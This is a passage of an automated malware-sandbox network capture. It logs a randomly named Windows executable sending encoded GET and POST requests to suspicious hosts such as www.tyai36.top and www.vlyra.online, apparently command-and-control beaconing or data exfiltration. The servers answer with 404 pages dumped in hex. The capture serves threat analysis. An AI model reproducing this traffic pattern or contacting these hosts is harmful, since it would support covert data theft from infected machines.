                                                                                  Aug 27, 2024 17:50:30.207577944 CEST2578OUTData Raw: 59 51 49 2f 4c 38 5a 4d 36 75 36 58 30 54 76 2b 36 53 71 68 4c 33 74 72 57 48 33 5a 5a 37 4b 47 54 62 2b 4a 53 65 39 5a 6d 7a 46 74 57 47 49 49 6e 35 66 61 48 32 35 6b 78 45 4d 55 47 4d 66 7a 4e 46 72 52 4b 7a 4c 44 39 6e 30 49 4b 54 4e 46 76 6f
                                                                                  Data Ascii: YQI/L8ZM6u6X0Tv+6SqhL3trWH3ZZ7KGTb+JSe9ZmzFtWGIIn5faH25kxEMUGMfzNFrRKzLD9n0IKTNFvoQxdvCq5J0NxKww5A2wReKuLueBVtcQGOlJt0BuypO9YxZWMMCj17yMJMDP24MSnO/ev918poFMtjWLNK14oIWHSdKyE4Fv+0y6Uqx4xrEk/bYJLozWSUI5wY/PGuw2FwvvlNsUcghpwCZ0XiwCMHP6JzjEBMZFicI
                                                                                  Aug 27, 2024 17:50:30.207642078 CEST3867OUTData Raw: 4a 36 7a 7a 6b 4d 43 68 62 55 76 71 52 46 79 67 34 36 69 58 35 68 55 64 45 33 44 78 4c 6b 73 61 62 47 52 36 78 53 45 57 6f 6b 51 5a 30 48 32 4e 53 45 79 6a 61 56 32 57 42 56 49 63 41 6d 63 68 61 4b 74 6f 35 59 78 7a 78 70 59 39 48 31 5a 2f 56 76
                                                                                  Data Ascii: J6zzkMChbUvqRFyg46iX5hUdE3DxLksabGR6xSEWokQZ0H2NSEyjaV2WBVIcAmchaKto5YxzxpY9H1Z/VvsKwnbeEhzTc+Cuek/b28nck8xnzUflI3uv5ei/7IemWBEpVTFNblfTO/6Mso+Iz8YGNU/z7u9l/JWunuQEgo6cBkll7mXRZM64wlQ/Jpe/JByhg8enX0vfcjhUZ0trgaa3GSd9NkDQVHb023KRSpEnXu7z0BoQFjr
                                                                                  Aug 27, 2024 17:50:30.207845926 CEST6445OUTData Raw: 5a 6b 34 36 2f 78 64 74 36 6f 47 33 46 71 62 42 6c 43 73 5a 57 2b 69 6c 73 63 7a 35 6e 68 6c 6b 58 63 6f 63 6d 7a 31 56 6f 72 37 4d 6a 37 58 57 48 62 64 66 50 31 2f 32 77 7a 77 50 52 66 48 73 36 55 56 34 58 2f 2f 6a 30 33 4a 7a 54 34 7a 6b 66 57
                                                                                  Data Ascii: Zk46/xdt6oG3FqbBlCsZW+ilscz5nhlkXcocmz1Vor7Mj7XWHbdfP1/2wzwPRfHs6UV4X//j03JzT4zkfWXyRFyx/8bWcdVFQ97ylFlIAqnrQK5QRynDl0Ab29LOryy5dCQalgrvBo93JL10Sfk6s1Xg/AIquSc38fC9xyyfBZXo4l9VVO+YfGxMxVmqm08xZwRiiA+E2ZwXd8R/ZJp3+toB5sR0eD93If0pzU1KsluSGpWvi9X
                                                                                  Aug 27, 2024 17:50:30.208039999 CEST10312OUTData Raw: 7a 44 6d 7a 38 46 4f 68 75 69 77 79 43 58 2f 38 6e 76 77 64 78 4c 54 31 54 36 50 62 53 59 4b 5a 2f 57 75 43 41 78 31 68 67 4d 32 61 70 66 4a 49 4f 72 79 38 76 6b 33 39 72 50 6a 37 36 37 2f 57 68 44 78 65 59 78 79 34 37 42 79 78 57 68 51 6c 39 59
                                                                                  Data Ascii: zDmz8FOhuiwyCX/8nvwdxLT1T6PbSYKZ/WuCAx1hgM2apfJIOry8vk39rPj767/WhDxeYxy47ByxWhQl9Y4T+Tfxfzf/5w8LeRgfz7rRwC0kr2dgB4Mul2aP1w3TMgxfpQCIuTRxz3St/r8aPCBVi0y5I0gkFpl/seRqRPYt18kX7zuUc7y8w+qHfGnFgMVzkcNkMwK0JFFoww0wZteYUrlW49ORQDN13LllGHa85MlgJhgNDpk
                                                                                  Aug 27, 2024 17:50:30.373867035 CEST2578OUTData Raw: 67 63 35 4c 2b 69 44 70 76 77 32 47 67 42 4a 52 4f 47 4d 42 77 42 6c 30 31 30 63 4c 70 69 55 52 39 78 5a 4f 72 57 6d 52 43 65 72 5a 54 6d 56 68 32 70 44 47 32 63 2f 51 5a 6c 4b 71 5a 54 6b 51 49 47 4e 2f 4d 63 61 79 2f 6e 54 33 4d 79 35 6f 45 4e
                                                                                  Data Ascii: gc5L+iDpvw2GgBJROGMBwBl010cLpiUR9xZOrWmRCerZTmVh2pDG2c/QZlKqZTkQIGN/Mcay/nT3My5oENFvjBDq2hBOd8vfHHlNtVaX2wEH4o3TjH7yeNJaNZYoIxP0Fj1MoGakQR1zkRWDJzSjgLjwOo5TaEmy4ATs+d+lqhhLqIe+AjJNhmNWWbB77CSPJ6/oz9WMhZUM9kSK0u8uOa6oxwH9xMDBxbtjfdFWglsQGDFlnqf
                                                                                  Aug 27, 2024 17:50:30.373887062 CEST3867OUTData Raw: 54 2f 79 52 57 6f 77 4a 48 53 6a 6c 6e 73 54 59 4a 31 71 78 44 33 2b 68 33 51 2f 57 32 5a 43 37 64 4e 64 66 2f 59 61 38 36 57 76 4e 2b 2f 4e 39 4f 73 76 74 46 4f 77 48 5a 2f 4c 7a 52 6b 62 33 38 73 79 49 70 65 50 35 4c 6b 32 2f 75 6a 69 78 2b 50
                                                                                  Data Ascii: T/yRWowJHSjlnsTYJ1qxD3+h3Q/W2ZC7dNdf/Ya86WvN+/N9OsvtFOwHZ/LzRkb38syIpeP5Lk2/ujix+PHGfo+rXl5iYp6XMz544js9Aqe7Ku4uOYu/ZtUDv/buQ3HinEYPQ8jpGlJ+Jayajt26HRbWPyzBO9RjS4sPpUmv0OK377GK6cssucXyxzWvDBUdpgVK5e7EuMd7WJgzP1LfscaqQrABHoIqF/v3Cq+kXD26PafZ63X
                                                                                  Aug 27, 2024 17:50:30.373965025 CEST5156OUTData Raw: 62 61 78 59 75 63 57 6c 5a 6a 6e 32 6e 50 65 4f 35 54 56 69 77 51 73 66 33 75 55 69 2f 47 45 65 78 6a 43 51 36 2b 34 36 75 39 63 49 41 70 4d 5a 37 35 43 4a 67 4a 75 4d 67 6f 75 69 57 31 78 69 77 6b 6e 51 43 57 32 2f 32 57 4d 68 50 39 75 52 58 38
                                                                                  Data Ascii: baxYucWlZjn2nPeO5TViwQsf3uUi/GEexjCQ6+46u9cIApMZ75CJgJuMgouiW1xiwknQCW2/2WMhP9uRX8MmdnpKS8bnPye3fQ8cxRtm1h9tDUyEh4T8IWAoHP/F8tilIJEnHy01nKeoV0NyNcGT269e4+Cv+gbfvX2ILREAXW5oUzjPLxqINJ/mHAhKu5m3JH6W0IUz0/RZwg0nnSgUc+OUkteGKhP6uvj32OC+Mxommzp7QEW
                                                                                  Aug 27, 2024 17:50:30.374138117 CEST3254OUTData Raw: 4b 2b 6f 57 51 4b 6e 73 2f 2b 55 6f 4b 35 6e 63 72 52 37 57 58 64 72 57 44 46 49 46 33 62 50 75 4d 36 77 67 34 6e 45 50 49 4c 6f 66 67 59 49 38 58 65 57 44 73 77 44 49 38 4c 4b 67 55 2f 74 43 62 72 4d 75 6f 6a 2b 67 69 46 77 57 68 4d 79 41 72 52
                                                                                  Data Ascii: K+oWQKns/+UoK5ncrR7WXdrWDFIF3bPuM6wg4nEPILofgYI8XeWDswDI8LKgU/tCbrMuoj+giFwWhMyArR/CZse9HbsfwPUlewvJ81oufQEPvLWBewiQi2S4tZQ8zlAfiLD6R4Tq+6sMu0gwlOCX5TLgwG3xDWsKATI3MTkUYFlq/cQSONL1On5xwRuTRwAegKpAltnU2/H1svKFRGt/oPgVc6Pli15vtH4j3Jt6t7TxmCGtqRG
                                                                                  Aug 27, 2024 17:50:30.566690922 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:50:30 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.11.2049863203.161.42.73805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:32.735111952 CEST525OUTGET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.vlyra.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:50:32.911341906 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 27 Aug 2024 15:50:32 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Aug 27, 2024 17:50:32.911415100 CEST1289INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20
                                                                                  Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
                                                                                  Aug 27, 2024 17:50:32.911467075 CEST1289INData Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32
                                                                                  Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
                                                                                  Aug 27, 2024 17:50:32.911570072 CEST1289INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22
                                                                                  Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
                                                                                  Aug 27, 2024 17:50:32.911737919 CEST1289INData Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e
                                                                                  Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
                                                                                  Aug 27, 2024 17:50:32.911751032 CEST1289INData Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37
                                                                                  Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
                                                                                  Aug 27, 2024 17:50:32.911881924 CEST1289INData Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                                                  Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                                                  Aug 27, 2024 17:50:32.911897898 CEST1289INData Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39
                                                                                  Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
                                                                                  Aug 27, 2024 17:50:32.912084103 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66
                                                                                  Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
                                                                                  Aug 27, 2024 17:50:32.912097931 CEST1289INData Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a
                                                                                  Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
                                                                                  Aug 27, 2024 17:50:33.078614950 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a
                                                                                  Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.11.204986438.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:38.408102989 CEST782OUTPOST /7te8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Origin: http://www.tyai36.top
                                                                                  Referer: http://www.tyai36.top/7te8/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 48 70 62 75 38 74 48 54 68 79 76 38 2b 55 38 63 68 59 49 46 65 67 32 7a 61 48 4c 7a 41 72 6f 51 30 2f 47 51 67 4e 78 77 4a 67 52 45 36 4f 2f 45 31 49 6d 46 68 7a 43 68 64 30 65 57 32 6a 50 39 54 31 42 79 7a 77 5a 4a 66 33 31 53 6f 41 53 76 4f 55 66 39 63 6f 36 66 36 57 51 6c 36 47 33 4c 4b 63 63 45 35 48 31 6f 49 55 59 39 5a 75 31 65 58 4a 48 58 46 7a 4c 4e 6e 43 56 44 62 4e 4d 2b 7a 39 6b 43 61 45 4d 69 53 62 45 59 6e 6c 39 38 72 39 4e 55 51 48 4d 6c 68 79 46 34 6f 7a 49 57 6b 34 57 6e 67 73 61 2f 4c 61 7a 41 43 79 32 63 66 76 35 51 2f 51 3d 3d
                                                                                  Data Ascii: AvLLLbOh=uBlYw/DxHcoMHpbu8tHThyv8+U8chYIFeg2zaHLzAroQ0/GQgNxwJgRE6O/E1ImFhzChd0eW2jP9T1ByzwZJf31SoASvOUf9co6f6WQl6G3LKccE5H1oIUY9Zu1eXJHXFzLNnCVDbNM+z9kCaEMiSbEYnl98r9NUQHMlhyF4ozIWk4Wngsa/LazACy2cfv5Q/Q==
                                                                                  Aug 27, 2024 17:50:38.716283083 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:50:38 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.11.204986538.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:41.266011953 CEST1122OUTPOST /7te8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Origin: http://www.tyai36.top
                                                                                  Referer: http://www.tyai36.top/7te8/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 4d 51 31 65 32 51 6e 49 64 77 4f 67 52 45 69 65 2f 42 32 34 6d 4f 68 7a 66 42 64 30 53 57 32 6a 4c 39 42 33 35 79 69 77 5a 4b 51 58 31 54 72 41 53 69 5a 45 66 4e 63 6f 32 44 36 58 30 6c 36 32 62 4c 62 75 45 45 75 43 4a 76 4d 30 59 37 66 75 31 64 4f 5a 48 4a 46 7a 33 76 6e 44 39 54 62 2b 51 2b 7a 64 45 43 5a 45 4d 68 61 72 45 66 72 46 38 70 6d 50 39 65 54 30 45 59 6e 79 74 39 76 42 30 35 6e 66 36 2f 69 73 6d 48 55 4c 50 6a 44 43 50 33 4b 63 55 46 37 44 52 6c 75 39 76 44 74 46 71 56 64 6b 62 37 6d 4b 57 69 43 36 7a 41 2f 79 52 30 30 77 4a 4a 6a 33 34 41 36 2f 58 74 44 39 65 6c 6d 54 59 4c 51 78 6f 34 52 59 33 6e 5a 75 68 72 4c 36 47 67 36 73 44 6b 42 42 71 54 4d 4c 75 44 37 42 64 71 44 65 51 77 4c 47 5a 53 34 42 6c 5a 4d 63 48 59 36 5a 7a 41 6a 78 56 35 38 51 4b 56 70 34 37 46 4a 64 51 4f 67 49 47 4b 47 74 72 6f 6e 69 70 5a 78 57 71 6c 44 51 6e 4f 41 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYMQ1e2QnIdwOgREie/B24mOhzfBd0SW2jL9B35yiwZKQX1TrASiZEfNco2D6X0l62bLbuEEuCJvM0Y7fu1dOZHJFz3vnD9Tb+Q+zdECZEMharEfrF8pmP9eT0EYnyt9vB05nf6/ismHULPjDCP3KcUF7DRlu9vDtFqVdkb7mKWiC6zA/yR00wJJj34A6/XtD9elmTYLQxo4RY3nZuhrL6Gg6sDkBBqTMLuD7BdqDeQwLGZS4BlZMcHY6ZzAjxV58QKVp47FJdQOgIGKGtronipZxWqlDQnOA7HnTZNYuZsQMFBC26G1ggrA5dn9F8wm8rZ9CcWEI9sWUk6xo/g03K/oJJdCcVbgJypFxX/tARlyVhj1uwFjERhAdGRVltiCVIEcgIl080yaie1fME2LLmq5/SZ7uGZ2Xc5hpdRcYIAikjo4L13+KS1YH1i0oZP4kIquAqUF0FmzY9mP2N34omTGHAd6GegCSTXrAe1W6GuipCA=
                                                                                  Aug 27, 2024 17:50:41.589143991 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:50:41 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
